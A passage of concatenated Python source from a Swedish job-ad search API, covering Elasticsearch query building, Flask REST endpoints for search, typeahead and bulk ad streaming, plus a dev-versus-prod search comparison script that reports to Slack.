f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": ckod, "boost": 1.0}}} for ckod in land]
plats_bool_query = {"bool": {
"should": plats_term_query}
} if plats_term_query else {}
neg_komm_term_query = []
neg_lan_term_query = []
neg_land_term_query = []
if neg_komm:
neg_komm_term_query = [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CODE: {
"value": kkod}}} for kkod in neg_komm]
neg_komm_term_query += [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CONCEPT_ID: {
"value": kkod}}} for kkod in neg_komm]
if neg_lan:
neg_lan_term_query = [{"term": {
f.WORKPLACE_ADDRESS_REGION_CODE: {
"value": lkod}}} for lkod in neg_lan]
neg_lan_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID: {
"value": lkod}}} for lkod in neg_lan]
if neg_land:
neg_land_term_query = [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CODE: {
"value": ckod}}} for ckod in neg_land]
neg_land_term_query += [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": ckod}}} for ckod in neg_land]
if neg_komm_term_query or neg_lan_term_query or neg_land_term_query:
if 'bool' not in plats_bool_query:
plats_bool_query['bool'] = {}
plats_bool_query['bool'][
'must_not'] = neg_komm_term_query + neg_lan_term_query + neg_land_term_query
return plats_bool_query
@staticmethod
def _build_remote_plats_query(remote):
if remote is None:
"""
If parameter is not used, search results should not be affected,
check for None is included to make True/False code identical
"""
pass
else:
"""
Both True and False for remote are "must".
True: only ads with "remote_work" shall be included
False: No ads with "remote_work" shall be included
"""
remote_plats_query = {
"bool": {
"must": {"term": {"remote_work": remote}},
}
}
return remote_plats_query
# Parses PUBLISHED_AFTER and PUBLISHED_BEFORE
@staticmethod
def _filter_timeframe(from_datestring, to_datetime):
if not from_datestring and not to_datetime:
return None
range_query = {"range": {f.PUBLICATION_DATE: {}}}
from_datetime = None
if from_datestring and re.match(r'^\d+$', from_datestring):
now = datetime.now()
from_datetime = now - timedelta(minutes=int(from_datestring))
elif from_datestring:
# from_datetime = datetime.strptime(from_datestring, '%Y-%m-%dT%H:%M:%S')
from_datetime = parser.parse(from_datestring)
if from_datetime:
log.debug("Filter ads from %s" % from_datetime)
range_query['range'][f.PUBLICATION_DATE]['gte'] = from_datetime.isoformat()
if to_datetime:
range_query['range'][f.PUBLICATION_DATE]['lte'] = to_datetime.isoformat()
return range_query
# Parses PARTTIME_MIN and PARTTIME_MAX
@staticmethod
def _build_parttime_query(parttime_min, parttime_max):
if not parttime_min and not parttime_max:
return None
if not parttime_min:
parttime_min = 0.0
if not parttime_max:
parttime_max = 100.0
parttime_query = {
"bool": {
"must": [
{
"range": {
f.SCOPE_OF_WORK_MIN: {
"lte": parttime_max,
"gte": parttime_min
},
}
},
{
"range": {
f.SCOPE_OF_WORK_MAX: {
"lte": parttime_max,
"gte": parttime_min
}
}
}
]
}
}
return parttime_query
@staticmethod
def _build_generic_query(keys, itemlist):
items = [] if not itemlist else itemlist
term_query = []
neg_term_query = []
if isinstance(keys, str):
keys = [keys]
for key in keys:
term_query += [{"term": {key: {"value": item}}}
for item in items if not item.startswith('-')]
neg_term_query += [{"term": {key: {"value": item[1:]}}}
for item in items if item.startswith('-')]
if term_query or neg_term_query:
query = {'bool': {}}
if term_query:
query['bool']['should'] = term_query
if neg_term_query:
query['bool']['must_not'] = neg_term_query
return query
return None
# Parses POSITION and POSITION_RADIUS
@staticmethod
def _build_geo_dist_filter(positions, coordinate_ranges):
geo_bool = {"bool": {"should": []}} if positions else {}
for index, position in enumerate(positions or []):
latitude = None
longitude = None
coordinate_range = coordinate_ranges[index] \
if coordinate_ranges is not None and index < len(coordinate_ranges) \
else settings.DEFAULT_POSITION_RADIUS
if position and ',' in position:
try:
latitude = float(re.split(', ?', position)[0])
longitude = float(re.split(', ?', position)[1])
except ValueError as e:
log.info("Bad position-parameter: \"%s\" (%s)" % (position, str(e)))
geo_filter = {}
if not latitude or not longitude or not coordinate_range:
return {}
elif ((-90 <= latitude <= 90)
and (-180 <= longitude <= 180) and (coordinate_range > 0)):
geo_filter["geo_distance"] = {
"distance": str(coordinate_range) + "km",
# OBS! order in REST request: latitude,longitude
f.WORKPLACE_ADDRESS_COORDINATES: [longitude, latitude]
}
if geo_filter:
geo_bool['bool']['should'].append(geo_filter)
return geo_bool
@staticmethod
def create_auto_complete_suggester(word):
""""
parse args and create auto complete suggester
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
fields = ['compound', ]
search = elasticsearch_dsl.Search()
search = search.source('suggest')
for field in fields:
search = search.suggest(
'%s-suggest' % field,
word,
completion={
'field': '%s.%s.suggest' % (enriched_typeahead_field, field),
"skip_duplicates": True,
"size": 50,
"fuzzy": {
"min_length": 3,
"prefix_length": 0
}
}
)
return search.to_dict()
@staticmethod
def create_phrase_suggester(input_words):
""""
parse args and create phrase suggester
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
field = '%s.compound' % enriched_typeahead_field
search = elasticsearch_dsl.Search()
search = search.source('suggest')
search = search.suggest(
'%s_simple_phrase' % field,
input_words,
phrase={
'field': '%s.trigram' % field,
'size': 10,
'max_errors': 2,
'direct_generator': [{
'field': '%s.trigram' % field,
'suggest_mode': 'always',
'min_word_length': 1
}, {
'field': '%s.reverse' % field,
'suggest_mode': 'always',
'pre_filter': 'reverse',
'post_filter': 'reverse',
'min_word_length': 1
}]
}
)
return search.to_dict()
@staticmethod
def create_suggest_search(suggest):
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
field = '%s.compound' % enriched_typeahead_field
search = defaultdict(dict)
query = search.setdefault('query', {})
match = query.setdefault('match', {})
field = match.setdefault(field, {})
field['query'] = suggest
field['operator'] = 'and'
return json.dumps(search)
@staticmethod
def create_check_search_word_type_query(word):
""""
Create check search word type query
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
search = defaultdict(dict)
aggs = search.setdefault('aggs', {})
for field in ('location', 'skill', 'occupation'):
aggs['search_type_%s' % field] = {
'terms': {
'field': '%s.%s.raw' % (enriched_typeahead_field, field),
'include': word
}
}
return json.dumps(search)
@staticmethod
def create_suggest_extra_word_query(word, first_word_type, second_word_type):
""""
Create suggest extra word query
"""
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
search = defaultdict(dict)
aggs = search.setdefault('aggs', {})
first_word = aggs.setdefault('first_word', {})
first_word['filter'] = {
'term': {
'%s.%s.raw' % (enriched_typeahead_field, first_word_type): word,
}
}
first_word['aggs'] = {
'second_word': {
'terms': {
'field': '%s.%s.raw' % (enriched_typeahead_field, second_word_type),
'size': 6
}
}
}
return json.dumps(search)
def calculate_utc_offset():
is_dst = time.daylight and time.localtime().tm_isdst > 0
utc_offset = - (time.altzone if is_dst else time.timezone)
return int(utc_offset / 3600) if utc_offset > 0 else 0
```
#### File: rest/endpoint/platsannonser.py
```python
import logging
import time
from flask import request
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from sokannonser import settings
from sokannonser.rest import ns_platsannons
from sokannonser.rest.model.queries import annons_complete_query, pb_query, load_ad_query
from sokannonser.rest.model.swagger import swagger_doc_params, swagger_filter_doc_params
from sokannonser.repository import platsannonser
from sokannonser.rest.model.result_models import (open_results, job_ad, typeahead_results)
from sokannonser.repository.querybuilder import QueryBuilder
import elasticapm
log = logging.getLogger(__name__)
@ns_platsannons.route('ad/<id>', endpoint='ad')
class Proxy(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
@ns_platsannons.doc(
description='Load a job ad by ID',
)
@ns_platsannons.response(401, 'Invalid API-key')
@ns_platsannons.response(404, 'Job ad not found')
@ns_platsannons.expect(load_ad_query)
@ns_platsannons.marshal_with(job_ad)
def get(self, id, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
return platsannonser.fetch_platsannons(str(id))
@ns_platsannons.route('ad/<id>/logo', endpoint='ad_logo')
class AdLogo(Resource):
@ns_platsannons.doc(
description='Load a logo binary file by ID',
)
@ns_platsannons.response(404, 'Job ad not found')
def get(self, id):
return platsannonser.fetch_platsannons_logo(str(id))
@ns_platsannons.route('search')
class Search(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
querybuilder = QueryBuilder()
@ns_platsannons.doc(
description='Search using parameters and/or freetext',
params={**swagger_doc_params, **swagger_filter_doc_params},
)
@ns_platsannons.response(401, 'Invalid API key')
@ns_platsannons.expect(pb_query)
@ns_platsannons.marshal_with(open_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time()*1000)
args = pb_query.parse_args()
log.debug("Query parsed after: %d milliseconds." % (int(time.time()*1000)-start_time))
result = platsannonser.find_platsannonser(args,
self.querybuilder,
start_time,
request.headers.get('X-Fields'))
log.debug("Query results after %d milliseconds."
% (int(time.time()*1000)-start_time))
max_score = result.get('max_score', 1.0)
hits = [dict(hit['_source'],
**{'relevance': (hit['_score'] / max_score)
if max_score > 0 else 0.0})
for hit in result.get('hits', [])]
return self.marshal_results(result, hits, start_time)
@staticmethod
def marshal_results(esresult, hits, start_time):
total_results = {'value': esresult.get('total', {}).get('value')}
result_time = int(time.time()*1000) - start_time
result = {
"total": total_results,
"positions": esresult.get('positions', 0),
"query_time_in_millis": esresult.get('took', 0),
"result_time_in_millis": result_time,
"stats": esresult.get('stats', []),
"freetext_concepts": esresult.get('concepts', {}),
"hits": hits
}
log.debug(f"Sending results after: {result_time} milliseconds.")
return result
@ns_platsannons.route('complete')
class Complete(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
querybuilder = QueryBuilder()
@ns_platsannons.doc(
description='Typeahead / Suggest next searchword',
params={
settings.CONTEXTUAL_TYPEAHEAD: "Set to false to disable contextual typeahead (default: true)",
**swagger_doc_params
}
)
@ns_platsannons.response(401, 'Invalid API-key')
@ns_platsannons.expect(annons_complete_query)
@ns_platsannons.marshal_with(typeahead_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time()*1000)
args = annons_complete_query.parse_args()
freetext_query = args.get(settings.FREETEXT_QUERY) or ''
limit = args[settings.LIMIT] if args[settings.LIMIT] <= settings.MAX_COMPLETE_LIMIT else settings.MAX_COMPLETE_LIMIT
result = {}
# have not get result or suggest have not get one suggest
if not result or len(result.get('aggs')) != 1:
args[settings.TYPEAHEAD_QUERY] = freetext_query
args[settings.FREETEXT_QUERY] = ' '.join(freetext_query.split(' ')[0:-1])
result = platsannonser.suggest(args, self.querybuilder)
# only get one suggestion
if len(result.get('aggs')) == 1:
extra_words = platsannonser.suggest_extra_word(args, result.get('aggs')[0]['value'].strip(), self.querybuilder) #TODO "args not used"
result['aggs'] += extra_words
log.debug('Extra words: %s' % result['aggs'])
# If there is space delete the same word with input word
if not freetext_query.split(' ')[-1]:
result['aggs'] = platsannonser.find_agg_and_delete(freetext_query.strip().split(' ')[0], result['aggs'])
log.debug('Empty typeahead. Removed item: %s Aggs after removal: %s' % (result['aggs'], result['aggs']))
log.debug("Typeahead query results after: %d milliseconds." % (int(time.time()*1000)-start_time))
return self.marshal_results(result, limit, start_time)
@staticmethod
def marshal_results(esresult, limit, start_time):
typeahead_result = esresult.get('aggs', [])
if len(typeahead_result) > limit:
typeahead_result = typeahead_result[:limit]
result = {
"time_in_millis": esresult.get('took', 0),
"typeahead": typeahead_result,
}
log.debug("Typeahead sending results after: %d milliseconds." % (int(time.time()*1000) - start_time))
return result
```
#### File: rest/model/queries.py
```python
from flask_restx import reqparse, inputs
from datetime import datetime
from sokannonser import settings
from sokannonser.repository import taxonomy
from sokannonser.rest.model import fields
# Frågemodeller
QF_CHOICES = ['occupation', 'skill', 'location', 'employer']
VF_TYPE_CHOICES = [taxonomy.OCCUPATION, taxonomy.GROUP, taxonomy.FIELD, taxonomy.SKILL,
taxonomy.MUNICIPALITY, taxonomy.REGION, taxonomy.COUNTRY,
taxonomy.PLACE, taxonomy.WAGE_TYPE, taxonomy.WORKTIME_EXTENT,
taxonomy.DRIVING_LICENCE, taxonomy.EMPLOYMENT_TYPE, taxonomy.LANGUAGE]
OPTIONS_BRIEF = 'brief'
OPTIONS_FULL = 'full'
def lowercase_maxlength(value):
if value is None:
raise ValueError('string type must be non-null')
if len(value) > 255:
raise ValueError('parameter can not be longer than 255 characters')
return str(value).lower()
load_ad_query = reqparse.RequestParser()
load_ad_query.add_argument(settings.APIKEY, location='headers', required=True)
base_annons_query = reqparse.RequestParser()
base_annons_query.add_argument(settings.APIKEY, location='headers', required=True)
base_annons_query.add_argument(settings.X_FEATURE_FREETEXT_BOOL_METHOD, choices=['and', 'or'],
default=settings.DEFAULT_FREETEXT_BOOL_METHOD, location='headers', required=False)
base_annons_query.add_argument(settings.X_FEATURE_DISABLE_SMART_FREETEXT, type=inputs.boolean,
location='headers', required=False),
base_annons_query.add_argument(settings.X_FEATURE_ENABLE_FALSE_NEGATIVE, type=inputs.boolean,
location='headers', required=False),
base_annons_query.add_argument(settings.PUBLISHED_BEFORE, type=lambda x: datetime.strptime(x, '%Y-%m-%dT%H:%M:%S'))
# annons_complete_query.add_argument(settings.PUBLISHED_AFTER,
# type=lambda x: datetime.strptime(x,
# '%Y-%m-%dT%H:%M:%S'))
datetime_or_minutes_regex = r'^(\d\d\d\d-(0?[1-9]|1[0-2])-(0?[1-9]|[12][0-9]|3[01])T(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]))|(\d+)$'
base_annons_query.add_argument(settings.PUBLISHED_AFTER,
type=inputs.regex(datetime_or_minutes_regex))
base_annons_query.add_argument(taxonomy.OCCUPATION, action='append')
base_annons_query.add_argument(taxonomy.GROUP, action='append')
base_annons_query.add_argument(taxonomy.FIELD, action='append')
base_annons_query.add_argument(taxonomy.COLLECTION, action='append')
base_annons_query.add_argument(taxonomy.SKILL, action='append')
base_annons_query.add_argument(taxonomy.LANGUAGE, action='append')
base_annons_query.add_argument(taxonomy.WORKTIME_EXTENT, action='append')
base_annons_query.add_argument(settings.PARTTIME_MIN, type=float)
base_annons_query.add_argument(settings.PARTTIME_MAX, type=float)
base_annons_query.add_argument(taxonomy.DRIVING_LICENCE_REQUIRED, type=inputs.boolean)
base_annons_query.add_argument(taxonomy.DRIVING_LICENCE, action='append')
base_annons_query.add_argument(taxonomy.EMPLOYMENT_TYPE, action='append')
base_annons_query.add_argument(settings.EXPERIENCE_REQUIRED, type=inputs.boolean)
base_annons_query.add_argument(taxonomy.MUNICIPALITY, action='append')
base_annons_query.add_argument(taxonomy.REGION, action='append')
base_annons_query.add_argument(taxonomy.COUNTRY, action='append')
base_annons_query.add_argument(settings.UNSPECIFIED_SWEDEN_WORKPLACE, type=inputs.boolean)
base_annons_query.add_argument(settings.ABROAD, type=inputs.boolean)
base_annons_query.add_argument(settings.REMOTE, type=inputs.boolean)
# Matches(lat,long) +90.0,-127.554334; 45,180; -90,-180; -90.000,-180.0000; +90,+180
# r for raw, PEP8
position_regex = r'^[-+]?([1-8]?\d(\.\d*)?|90(\.0*)?),' \
r'[-+]?(180(\.0*)?|((1[0-7]\d)|([1-9]?\d))(\.\d*)?)$'
base_annons_query.add_argument(settings.POSITION, type=inputs.regex(position_regex), action='append')
base_annons_query.add_argument(settings.POSITION_RADIUS, type=int, action='append')
base_annons_query.add_argument(settings.EMPLOYER, action='append')
base_annons_query.add_argument(settings.FREETEXT_QUERY, type=lowercase_maxlength)
base_annons_query.add_argument(settings.FREETEXT_FIELDS, action='append', choices=QF_CHOICES)
annons_complete_query = base_annons_query.copy()
annons_complete_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_COMPLETE_LIMIT), default=10)
annons_complete_query.add_argument(settings.CONTEXTUAL_TYPEAHEAD, type=inputs.boolean, default=True)
pb_query = base_annons_query.copy()
pb_query.add_argument(settings.MIN_RELEVANCE, type=float),
pb_query.add_argument(settings.DETAILS, choices=[OPTIONS_FULL, OPTIONS_BRIEF])
pb_query.add_argument(settings.OFFSET, type=inputs.int_range(0, settings.MAX_OFFSET), default=0)
pb_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_LIMIT), default=10)
# TODO: Remove sort_option 'id' in next major version
pb_query.add_argument(settings.SORT, choices=list(fields.sort_options.keys()) + ['id'])
pb_query.add_argument(settings.STATISTICS, action='append',
choices=[taxonomy.OCCUPATION, taxonomy.GROUP,
taxonomy.FIELD, taxonomy.COUNTRY,
taxonomy.MUNICIPALITY, taxonomy.REGION])
pb_query.add_argument(settings.STAT_LMT, type=inputs.int_range(0, 30), required=False)
taxonomy_query = reqparse.RequestParser()
taxonomy_query.add_argument(settings.APIKEY, location='headers', required=True)
taxonomy_query.add_argument(settings.OFFSET, type=inputs.int_range(0, settings.MAX_OFFSET), default=0)
taxonomy_query.add_argument(settings.LIMIT, type=inputs.int_range(0, settings.MAX_TAXONOMY_LIMIT), default=10)
taxonomy_query.add_argument(settings.FREETEXT_QUERY)
taxonomy_query.add_argument('type', action='append', choices=VF_TYPE_CHOICES),
taxonomy_query.add_argument(settings.SHOW_COUNT, type=inputs.boolean, default=False)
taxonomy_query.add_argument('parent-id', action='append')
```
#### File: castaway/task/freetext_compare.py
```python
import requests
import os
import time
from task.slack_tool import SlackMessage, SlackAttachment
from sokannonser import settings
# channel could be dev, stage, prod
url = {
'dev': settings.URL_DEV + 'search',
'stage': settings.URL_STAGE + 'search',
'prod': settings.URL_PROD + 'search',
}
def run_test_cases(file_name, channel1, channel2):
this_folder = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(this_folder, 'test_cases/' + file_name)
freetext_hits_result = list()
freetext_first_hit_result = list()
freetext_first_ten_hits_result = list()
with open(my_file, 'r') as file:
for line in file.readlines():
q = line.rstrip("\n")
channel1_result = get_search_result(q, url[channel1])
channel2_result = get_search_result(q, url[channel2])
different_count = 0
sum_count = 0
sum_count += 1
# this only use freetext to check hits
freetext_hits = check_freetext_hits(channel1_result, channel2_result)
if freetext_hits:
freetext_hits_result.append(freetext_hits+[q, channel1, channel2])
different_count += 1
# this only use freetext to check first hit
freetext_first_hit = check_freetext_first_hits(channel1_result, channel2_result)
if freetext_first_hit:
freetext_first_hit_result.append(freetext_first_hit+[q, channel1, channel2])
# this is used to check first ten hit is the same or not
freetext_first_ten_hits = check_freetext_first_ten_hits(channel1_result, channel2_result)
if freetext_first_ten_hits:
freetext_first_ten_hits_result.append(freetext_first_ten_hits+[q, channel1, channel2])
# send slack message
send_freetext_hits_result_slack_message(freetext_hits_result)
send_freetext_hit_result_utility_slack_message(different_count, sum_count)
send_freetext_first_hit_result_slack_message(freetext_first_hit_result)
send_freetext_first_ten_hits_result_slack_message(freetext_first_ten_hits_result)
def get_search_result(q, env):
headers = {'api-key': settings.APIKEY, }
params = {'q': q, 'sort': 'pubdate-desc'}
responses = requests.get(url=env, params=params, headers=headers)
response_json = responses.json()
return response_json
color = {
'red': SlackAttachment.DANGER,
'yellow': SlackAttachment.WARNING,
'green': SlackAttachment.GOOD
}
def check_color(different, hits):
if abs(different) / hits > 0.25:
return color['red']
elif abs(different) / hits > 0.01:
return color['yellow']
return color['green']
def check_freetext_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('total').get('value')
channel2_hits = channel2_result.get('total').get('value')
difference = channel1_hits - channel2_hits
if difference:
median = (channel1_hits + channel2_hits) / 2
colour = check_color(difference, median)
return [colour, channel1_hits, channel2_hits, difference]
return difference
def check_freetext_first_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('hits')
channel2_hits = channel2_result.get('hits')
channel1_hits_first = channel1_hits[0].get('id', 0) if channel1_hits else 'None'
channel2_hits_first = channel2_hits[0].get('id', 0) if channel2_hits else 'None'
different = 0
if channel1_hits_first != channel2_hits_first:
different = [channel1_hits_first, channel2_hits_first]
return different
def check_freetext_first_ten_hits(channel1_result, channel2_result):
channel1_hits = channel1_result.get('hits')
channel2_hits = channel2_result.get('hits')
if len(channel1_hits) >= 10:
channel1_first_ten = [hit['id'] for hit in channel1_hits[:10]]
else:
channel1_first_ten = [hit['id'] for hit in channel1_hits]
if len(channel2_hits) >= 10:
channel2_first_ten = [hit['id'] for hit in channel2_hits[:10]]
else:
channel2_first_ten = [hit['id'] for hit in channel2_hits]
different = 0
if len(channel1_first_ten) != len(channel2_first_ten):
different = [channel1_first_ten, channel2_first_ten]
else:
for i in range(len(channel1_first_ten)):
if channel1_first_ten[i] != channel2_first_ten[i]:
different = [channel1_first_ten, channel2_first_ten]
break
return different
def send_freetext_hits_result_slack_message(result):
result = sorted(result, key=lambda item: item[3], reverse=True)
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(title="Freetext hits difference",)]).send()
for colour, channel1_hits, channel2_hits, difference, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=colour,
text="{q}: {ch1_h} {ch1} hits & {ch2_h} {ch2} hits: {diff} diff".format(
q=q,
ch1_h=channel1_hits,
ch1=channel1,
ch2_h=channel2_hits,
ch2=channel2,
diff=difference
))
]
).send()
time.sleep(0.5)
def send_freetext_hit_result_utility_slack_message(difference, all_count):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext hits difference: {diff}, utility: {utility}%".format(
diff=difference,
utility=round(difference/all_count*100, 2)
),
)]).send()
def send_freetext_first_hit_result_slack_message(result):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext first hit difference",
)]).send()
for channel1_first_hit, channel2_first_hit, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=color['red'],
text="{q} first hit: {ch1_hit} {ch1} & {ch2_hit} {ch2}".format(
q=q,
ch1_hit=channel1_first_hit,
ch1=channel1,
ch2_hit=channel2_first_hit,
ch2=channel2
))
]
).send()
time.sleep(0.5)
def send_freetext_first_ten_hits_result_slack_message(result):
SlackMessage(channel=settings.TEST_RESULT_CHANNEL,
attachments=[SlackAttachment(
title="Freetext first ten hits difference",
)]).send()
for channel1_first_ten_hit, channel2_first_ten_hit, q, channel1, channel2 in result:
SlackMessage(
channel=settings.TEST_RESULT_CHANNEL,
attachments=[
SlackAttachment(
color=color['red'],
text="{q} first 10 hits rank diff: {ch1_hit} {ch1} & {ch2_hit} {ch2}".format(
q=q,
ch1_hit=str(channel1_first_ten_hit),
ch1=channel1,
ch2_hit=str(channel2_first_ten_hit),
ch2=channel2
))
]
).send()
time.sleep(0.5)
run_test_cases('q_text_cases.txt', 'dev', 'prod')
```
#### File: task/rest/bulk.py
```python
import logging
import time
from datetime import datetime, timedelta
from flask import send_file, Response
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from bulkloader.rest import ns_bulk, bulk_zip_query, bulk_stream_query
from bulkloader import repository
from sokannonser import settings
import elasticapm
log = logging.getLogger(__name__)
# @ns_bulk.route('zip')
class BulkZip(Resource):
method_decorators = [check_api_key_and_return_metadata('bulk', 300)]
@ns_bulk.doc(
params={
settings.DATE: "Date to zip ads for. Accepts date as YYYY-MM-DD or 'all'. "
"(Note that 'all' can take a couple of minutes to compile.)"
" Rate limit is one request every five minutes."
},
responses={
200: 'OK',
401: 'Invalid API-key',
429: 'Rate limit exceeded',
500: 'Technical error'
}
)
@ns_bulk.expect(bulk_zip_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs['key_app'], user_id=kwargs['key_id'])
start_time = int(time.time()*1000)
args = bulk_zip_query.parse_args()
bytes_result = repository.zip_ads(args.get(settings.DATE), start_time)
filename = "ads_%s.zip" % args.get(settings.DATE)
log.debug("Elapsed time for completion: %d" % int((time.time()*1000)-start_time))
return send_file(bytes_result,
attachment_filename=filename, cache_timeout=60,
as_attachment=True)
@ns_bulk.route('tests')
class BulkLoad(Resource):
method_decorators = [check_api_key_and_return_metadata('bulk', 60)]
example_date = (datetime.now() - timedelta(minutes=10)).strftime("%Y-%m-%dT%H:%M:%S")
@ns_bulk.doc(
params={
settings.DATE: "Stream ads updated since datetime. "
"Accepts datetime as YYYY-MM-DDTHH:MM:SS, "
"for example %s. Rate limit is one request per minute." % example_date
},
responses={
200: 'OK',
401: 'Invalid API-key',
429: 'Rate limit exceeded',
500: 'Technical error'
}
)
@ns_bulk.expect(bulk_stream_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
args = bulk_stream_query.parse_args()
return Response(repository.load_all(args.get(settings.DATE)),
mimetype='application/json')
```
#### File: castaway/task/slack_tool.py
```python
from datetime import datetime
from typing import Optional, Dict, List, Any
from sokannonser import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_text
import slack
from slack import errors
if settings.SLACK_STORE_MESSAGE:
def retrieve_outbox_slack_messages():
# Returns locally stored messages during tests
if 'outbox' not in globals():
return []
global outbox # noqa
return outbox
def clear_slack_messages():
if 'outbox' in globals():
global outbox
outbox = []
def get_channel_id(channel_name: str) -> str:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.channels_list() # Let exceptions propagate. There's nothing we can do here.
if slack_response['ok'] is False:
raise errors.SlackClientError # Something's wrong with either the token or user permissions
try:
channel_id = list(filter(lambda chan: chan['name'] == channel_name, slack_response['channels']))[0]['id']
except IndexError:
raise ValueError("Channel {} does not exist".format(channel_name))
return channel_id
class SlackAttachment(object):
# Default attachment colors, you can also hex codes.
GOOD = 'good' # Green
WARNING = 'warning' # Yellow
DANGER = 'danger' # Red
default_markdown_fields = ['pretext', 'text', 'fields']
def __init__(
self, fallback: str = '', color: str = GOOD, pretext: Optional[str] = None,
author_name: Optional[str] = None,
author_link: Optional[str] = None, author_icon: Optional[str] = None, title: str = '',
title_link: Optional[str] = None,
text: str = '', fields: Optional[List[Dict]] = None, image_url: Optional[str] = None,
thumb_url: Optional[str] = None,
footer: Optional[str] = None, footer_icon: Optional[str] = None, ts: Optional[datetime] = None,
mrkdwn_in: Optional[List[str]] = None, **kwargs
) -> None:
self.fallback = fallback
self.color = color
self.pretext = pretext
self.author_name = author_name
self.author_link = author_link
self.author_icon = author_icon
self.title = title
self.title_link = title_link
self.text = text
self.fields = fields
self.image_url = image_url
self.thumb_url = thumb_url
self.footer = footer
self.footer_icon = footer_icon
self.ts = ts
if mrkdwn_in is None:
mrkdwn_in = self.default_markdown_fields
self.mrkdwn_in = mrkdwn_in
def __eq__(self, o: object) -> bool:
if type(o) != SlackAttachment:
return False
return self.to_dict() == getattr(o, 'to_dict')()
def to_dict(self) -> Dict[str, Any]:
ret = {
'fallback': self.fallback,
'color': self.color,
'pretext': self.pretext,
'author_name': self.author_name,
'author_link': self.author_link,
'author_icon': self.author_icon,
'title': self.title,
'title_link': self.title_link,
'text': self.text,
'fields': self.fields,
'image_url': self.image_url,
'thumb_url': self.thumb_url,
'footer': self.footer,
'footer_icon': self.footer_icon,
'ts': self.ts.timestamp() if self.ts else None,
'mrkdwn_in': self.mrkdwn_in,
}
return {k: v for k, v in ret.items() if v is not None}
def __repr__(self):
return 'Text: {}'.format(self.text)
class Empty:
pass
class SlackMessage(object):
"""
To use, do SlackMessage(**kwargs).send().
For attachments argument, use above SlackAttachment class and provide as an iterable.
"""
def __eq__(self, o: object) -> bool:
if type(o) != SlackMessage:
return False
for field in ('message', 'channel', 'attachments', 'template'):
if not getattr(self, field) == getattr(o, field, Empty):
return False
return True
def __hash__(self):
return hash(str(self))
def __init__(self, message='', attachments=None, channel=None, template=None) -> None:
if channel is None:
channel = settings.SLACK_CHANNEL
if template is None:
template = settings.SLACK_DEFAULT_TEMPLATE
self.message = message
self._channel = channel
self._attachments = attachments
self.template = template
self._timestamp = None
self._channel_id = None
def __str__(self):
return str({
"channel": self._channel,
"text": self.message,
"attachments": self.attachments,
"template": self.template,
})
def __repr__(self):
return "SlackMessage({})".format(str(self))
@property
def channel(self):
# If we set SLACK_REDIRECT_CHANNEL setting, override channel provided on __init__.
return settings.SLACK_REDIRECT_CHANNEL if settings.SLACK_REDIRECT_CHANNEL else self._channel
@property
def context(self):
return {
"channel": self.channel,
"message": self.message,
}
@property
def attachments(self):
return [attachment.to_dict() for attachment in self._attachments] if self._attachments else None
@property
def rendered_template(self):
return force_text(render_to_string(self.template, self.context).strip())
@property
def id(self):
return self._timestamp
@id.setter
def id(self, value):
self._timestamp = value
@property
def channel_id(self):
if not self._channel_id:
# The id is not needed for regular sending, so we load it only if we use it
self._channel_id = get_channel_id(self.channel)
return self._channel_id
def replace_last_attachment(self, attachment):
# Replace last attachment if exists, else sets attachment at index 0.
try:
self._attachments[-1] = attachment
except IndexError:
# TODO: Or do nothing and let exception go up?
self._attachments.append(attachment)
def set_attachments(self, attachments):
if type(attachments) in (list, tuple):
self._attachments = attachments
elif type(attachments) == SlackAttachment:
self._attachments = [attachments]
else:
raise ValueError
def add_attachment(self, attachment: SlackAttachment):
if self._attachments:
self._attachments.append(attachment)
else:
self._attachments = [attachment]
def send(self, fail_silently=True):
if settings.SLACK_STORE_MESSAGE:
# Store messages locally during tests
if 'outbox' not in globals():
global outbox
outbox = []
outbox.append(self)
if not settings.SLACK_ENABLED:
if settings.PRINT_SLACK_MESSAGE:
print(self)
return
else:
try:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.chat_postMessage(
channel=self.channel,
text=self.message,
attachments=self.attachments,
as_user=False,
)
if slack_response['ok']:
self.id = slack_response['ts']
else:
